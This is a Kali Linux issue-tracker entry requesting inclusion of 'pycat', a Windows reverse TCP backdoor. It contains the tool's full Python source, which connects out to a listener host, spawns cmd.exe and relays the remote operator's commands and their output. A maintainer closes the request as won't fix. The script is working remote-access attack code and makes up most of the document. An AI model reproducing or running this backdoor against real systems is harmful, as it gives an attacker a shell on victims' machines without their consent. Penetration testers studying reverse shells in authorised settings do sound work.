View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0005412Kali LinuxNew Tool Requestspublic2019-04-26 22:422019-10-28 13:34
Reporterdanielhnmoreno Assigned To 
PrioritynormalSeverityfeatureReproducibilityalways
Status closedResolutionwon't fix 
Product Version2019.1 
Summary0005412: pycat - Windows Reverse TCP backdoor
Description

pycat is similar to netcat reverse cmd prompt shell.

Demo: youtube.com/watch?v=3sMhHL6c68E
GitHub: github.com/danielhnmoreno/pycat

Steps To Reproduce

Usage (Windows only with Python 3 installed):
python pycat.py --host NETCAT_IP_LISTNER --port PORT

Attached Files
pycat.py (2,332 bytes)    
import asyncio
import socket
import argparse

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 
                                 description="###############         pycat         ###############\n" \
                                             "          Windows Reverse TCP backdoor\n"
                                             "Usage: python pycat.py --host netcatIP --port PORT\n\n" \
                                             "Demo:    youtube.com/watch?v=3sMhHL6c68E\n"\
											 "GitHub:  github.com/danielhnmoreno/pycat\n" \
                                             "Contact: [email protected]")

parser.add_argument('--host', action = 'store', dest = 'host', required = True, help = 'Host listening for reverse connection')
parser.add_argument('--port', action = 'store', type=int, dest = 'port', required = True, help = 'Port')

arguments = parser.parse_args()

HOST = arguments.host
PORT = arguments.port


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

async def shell():
    while 1:
        proc = await asyncio.create_subprocess_shell("cmd",
                                                     stdin=asyncio.subprocess.PIPE,
                                                     stdout=asyncio.subprocess.PIPE,
                                                     stderr=asyncio.subprocess.STDOUT)
        cmd = b"\n"
        proc.stdin.write(cmd)

        while 1:
            while 1:
                out = await proc.stdout.readline()
                break_ = out.decode("latin-1")
                if break_[-2:] == ">\n" or break_[-3:] == "> \n":
                    s.send(out[:-1])
                    break
                elif break_.endswith(">" + cmd.decode()) or break_.endswith("> " + cmd.decode()):
                    pass
                else:
                    s.send(out)

            cmd = s.recv(1024)
            cmd_ = cmd.decode()
            if cmd_ == "\n":
                proc.stdin.write(b"\n")
            elif cmd_.startswith("exit"):
                proc.terminate()
                break
            else:
                proc.stdin.write(cmd + b"\n")

asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(shell())
pycat.py (2,332 bytes)   

Activities

g0tmi1k

g0tmi1k

2019-10-28 13:34

administrator   ~0011239

Not sure what this brings to the table.
You can easy todo this with netcat/bash (such as disabling Ctrl + C)

Issue History

Date Modified Username Field Change
2019-04-26 22:42 danielhnmoreno New Issue
2019-04-26 22:42 danielhnmoreno File Added: pycat.py
2019-10-28 13:34 g0tmi1k Note Added: 0011239
2019-10-28 13:34 g0tmi1k Status new => closed
2019-10-28 13:34 g0tmi1k Resolution open => won't fix